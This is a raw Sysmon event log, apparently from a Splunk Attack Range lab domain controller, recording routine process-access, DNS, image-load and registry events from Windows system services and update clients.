13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-1600-00000000A301}15441840C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:42:00.020{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exeC:\Windows\SoftwareDistribution\SIH\stage\eng\siheng.dll2021-01-18 13:42:00.004 22542200x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.910{59A5CD1D-9027-6005-1201-00000000A301}4836download.windowsupdate.com0type: 5 wu-fg-shim.trafficmanager.net;type: 5 2-01-3cf7-0009.cdx.cedexis.net;type: 5 fg.download.windowsupdate.com.c.footprint.net;::ffff:8.253.95.120;::ffff:67.27.158.254;::ffff:67.27.159.126;::ffff:67.27.234.126;::ffff:8.248.131.254;C:\Windows\System32\SIHClient.exe 22542200x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.250{59A5CD1D-9027-6005-1201-00000000A301}4836sls.update.microsoft.com0type: 5 sls.update.microsoft.com.akadns.net;type: 5 sls.emea.update.microsoft.com.akadns.net;::ffff:52.152.110.14;C:\Windows\System32\SIHClient.exe 22542200x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:01.539{59A5CD1D-8E56-6005-2E00-00000000A301}2464120.95.253.8.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:00.465{59A5CD1D-8E56-6005-2E00-00000000A301}246414.110.152.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 13241300x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:42:14.645{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0xbaf8ba33) 10341000x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:17.520{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:17.520{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:19.848{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:44.691{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9054-6005-1501-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 